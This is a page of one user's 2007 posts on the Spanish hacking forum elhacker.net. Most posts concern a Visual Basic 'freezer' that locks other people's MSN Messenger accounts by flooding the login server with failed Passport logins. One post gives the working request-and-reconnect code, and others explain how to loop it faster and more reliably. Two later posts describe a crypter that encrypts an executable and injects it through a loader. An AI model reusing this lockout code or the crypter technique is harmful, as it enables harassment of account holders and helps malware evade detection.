elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [25] 26 27 28 29 30 31 32
241  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 2 Agosto 2007, 04:34 am
Citar
Yo use las apis porque así lo hacia = que el icecold y no me rompía la cabeza.

Si eso da =, el controlo inet no es mas k un ocx k utiliza esas apis, aunk es mas facil de usar xD

Citar
En todo caso lo que no entiendo es toda la tacada de código que a puesto el que inicio este hilo si se puede hacer con las lineas que lo he hecho yo.

100% de acuerdo, lo dice hace unos posts atras..

Salu2
242  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 2 Agosto 2007, 02:22 am
Exacto! Veo k entiendeste perfectamente lo k dice.

La diferencia esk lo hago con el control inet ya k no me importa la dependencia y no hay k hacer nada como la funcion Satura.

Aki la parte del codigo k uso para los requests:

Código:
.
.
.
    Case "USR 3"
        sTmp = Split(sData, "USR 3 TWN S ")
        sChallengeString = sTmp(1)
        netMain.Execute "https://nexus.passport.com/rdr/pprdr.asp", "GET"
        Do Until netMain.StillExecuting = False
            DoEvents
        Loop
        iStart = InStr(netMain.GetHeader("PassportURLs"), "DALogin=") + 8
        iLength = InStr(iStart, netMain.GetHeader("PassportURLs"), ",")
        sDALogin = Mid(netMain.GetHeader("PassportURLs"), iStart, iLength - iStart)
        netMain.Execute "https://" & sDALogin, "GET", , "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" & FixAccount(txtAccount.Text) & ",pwd=password," & sChallengeString
        Do Until netMain.StillExecuting = False
            DoEvents
        Loop
        If bLock = True Then
            If stbMain.Panels(1).Text <> ">> Account Frozen!" Then
                If stbMain.Panels(1).Text <> ">> Freezing... [90%]" Then
                    iStatus = iStatus + 10
                    stbMain.Panels(1).Text = ">> Freezing... [" & iStatus & "%]"
                    Call basTray.Modify(Me, "ICEBERG", "Freezing... [" & iStatus & "%]")
                Else
                    iStatus = 0
                    stbMain.Panels(1).Text = ">> Account Frozen!"
                    Call basTray.Modify(Me, "ICEBERG", "Account Frozen!")
                End If
            End If
            sckMain.Close
            sckMain.Connect "messenger.hotmail.com", 1863
        End If
    End Select
.
.
.

Salu2 ;)
243  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 2 Agosto 2007, 00:35 am
Pero yo lo hago por un motivo, con conectar una vez cada dos segundos es suficiente, para que quiero conectar mas veces mas rápido si con eso es bastante?

Porcierto lo haces igual k el icecold, no haces la conexion toda desde el inicio y con ese metodo falla al fin de un tiempo, ya k la challenge string expira, deberias empezar de nuevo la conexion en cada intento de login.

Algo como en el boton freeze le pones la conexion al messenger.hotmail.com y despues en el evento connect envia la primera peticion. Despues en el datarrival haces todas las demas peticiones y en el final, como ya havia dicho, haces el connect (como en el boton freeze), lo k te pone de nuevo en el evento connect, o sea un loop.

Asi se hace correctamente un freezer. Aunk k el ejemplo k has puesto ya  es algo con k se puedan orientar para haceren sus freezeres. Mejor k poner el codigo de un cliente de msn...

Salu2
244  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 2 Agosto 2007, 00:08 am
Tienes razón, pero el programa no esta optimizado, lo hice por pasar el rato y con el timer hago la conexión cada 2s que es suficiente para mantener la cuenta bloqueada, si pusiera un bucle la velocidad dependería de la velocidad de su conexión a internet.

Y es eso k se kiere. A la velocidad de la conexion es automaticamente la maior velocidade k puedes obtener y encima sin kualkier fallo.

Salu2
245  Programación / Programación Visual Basic / Re: Necesito opinión sobre una futura GUI en: 1 Agosto 2007, 20:27 pm
Hola

Pues a mi no me gusta, creo k puedes hacer una mejor con otros colores, el layout esta bueno. Pero es mi opinion personal y la verdad esk no me gusta ese color xD

Ah una cosita, creo k deberias elijir un idioma y no usar 2 al mismo tiempo :S

Ah y se lo haces en ingles hay k corrijir esto: Encryption y no Encription ;)

Salu2
246  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 1 Agosto 2007, 16:10 pm
Pork un timer? Les gusta usar timers por todo y por nada... No es nada bueno hacerlo con un timer ya k encima es muy facil aprovechar un loop k te oferecen las proprias necesidades del programa. Al hacer la conexion recibe los datos con el socket, despues en ese mismo evento se hacen las peticiones con inet/apis de la librera wininet y en el final empieza de nuevo con la conexion al messenger.hotmail.com. Y con esto se hace un loop. Para detenerlo solo hay k anadir un boolean y listo.

Salu2
247  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 30 Julio 2007, 04:23 am
pasra TugHack:
te agradeceria que si vas a colaborar que lo hagas, pero no hagas criticas inconstructivas, si lo hiciste en pocas lineas pues postealo (se q no lo haras..) pero no te presumas...
PD: NO seguire esta discucion por parte de tughack... seguire con el resto del aporte.

Pff pues solo hice un comentario k por cierto tiene su parte construtiva... O crees k decirle k esta codigo a mas y k lo puede hacer mejor no es contructivo?

Se solo puedo postear para decir "Muy bien!" no se para k sirve el foro...
248  Programación / Programación Visual Basic / Re: Fabricando un congelador tipo ice cold en vb en: 30 Julio 2007, 03:26 am
Uff esta ahi kasi un cliente de msn  ;D No es necesario tanto codigo. El iceberg lo hice con muy pocas lineas.

No voy decir k te creo kuando dices k lo has echo tu pork mucho de lo k esta ahi ni sekier es necesario para el freezer, me suena a copy&paste pero en fin no lo tomes mal, no quiero iniciar una discussion.

Al menos posteas algo ya k la gente no sabe buscar... Ya haran algo por aki...

Salu2
249  Programación / Programación Visual Basic / Re: Nyp-Binder 1.5 en: 25 Julio 2007, 14:16 pm
Yo y mi amigo slasher lo dejamos por imposible porque los ejecutables compilados en vb tienen una particularidad al mapearse en memoria que hace que no puedan ser puestos en otro sitio mas que el asignado. Sino entiendes de estructura de ejecutables y de como trabaja el SO con ellos no le des vueltas, es un tema complicado.
Digo que si que se puede hacer, pero vb no es el lenguaje mas indicado.

Si vb no es indicado, pero lo hice, hice un crypter k inyecta el codigo en el ejecutable aunk no lo he podido hacer como keria.

Mi objectivo era agregar un stub al archivo, cambiar el entry point y cifrar la sección de codigo, pero esto si es mas complicado en vb. Lo k pude hacer fue agregar el archivo al stub, (con su codigo cifrado) luego el stub lo extrae y lo inyecta, aunk no se puede inyectar en el proprio exe, por eso saca un loader.exe para hacerlo. No es un metodo muy bueno pero creo k es la unika solucion en vb...

Salu2
250  Programación / Programación Visual Basic / Re: Nyp-Binder 1.5 en: 25 Julio 2007, 13:57 pm
En la proxima version ponele inyeccion en memoria para los ejecutables
Lo veo mu negro, negra.

Hm pork?
Páginas: 1 ... 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [25] 26 27 28 29 30 31 32
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines